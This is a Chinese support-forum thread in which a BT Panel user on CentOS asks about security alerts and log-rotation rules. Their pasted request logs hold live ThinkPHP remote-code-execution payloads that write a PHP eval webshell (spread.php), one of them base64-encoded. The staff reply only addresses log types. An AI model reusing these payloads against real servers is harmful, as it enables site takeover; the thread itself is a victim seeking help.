【待反馈】异常的日志内容
为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:7.6.0系统版本:centos
问题描述:安全中心告警
相关截图(日志、错误):/www/server/panel/logs/request
这个下面的日志是什么日志文件,安全中心有告警说有异常文件注入访问的url为["2024-07-16 02:13:00", "124.222.78.12:51659", "POST", "/public/index.php/?s=captcha", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "{'_method': '__construct', 'filter[]': \"file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8 '))\", 'method': 'get', 'server': '<?php @eval($_POST);?>'}", 1]
["2024-07-16 02:13:00", "124.222.78.12:53996", "GET", "/public/index.php?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "{}", 1]
还有这个目录下面的日志的压缩规则是什么,这个日志的json文件是在每天什么情况下什么时间才会打包为.gz文件呢
您好,这个是面板的操作日志,您面板左侧列表中的日志,操作日志,这个没有固定时间 运维技术阿闯 发表于 2024-7-16 15:28
您好,这个是面板的操作日志,您面板左侧列表中的日志,操作日志,这个没有固定时间 ...
那看上面的那个请求地址,是有人通过面板操作了这种恶意文件的写入吗,我看源文件有这个记录,但是点击面板左侧的日志看不到这个日志呢 运维技术阿闯 发表于 2024-7-16 15:28
您好,这个是面板的操作日志,您面板左侧列表中的日志,操作日志,这个没有固定时间 ...
我看这个压缩是每天都会生成一个 .json.gz的文件,这个如果没有固定时间的话,那么应该有个固定的规则的吧,就是什么情况下才会把这个json文件打包为一个gz文件。
这个可否告知一下,谢谢啦 宝塔用户_mnhkfj 发表于 2024-7-16 15:39
我看这个压缩是每天都会生成一个 .json.gz的文件,这个如果没有固定时间的话,那么应该有个固定的规则的 ...
您好,这边也没有的,这个应该是一个日志切割之类的
页:
[1]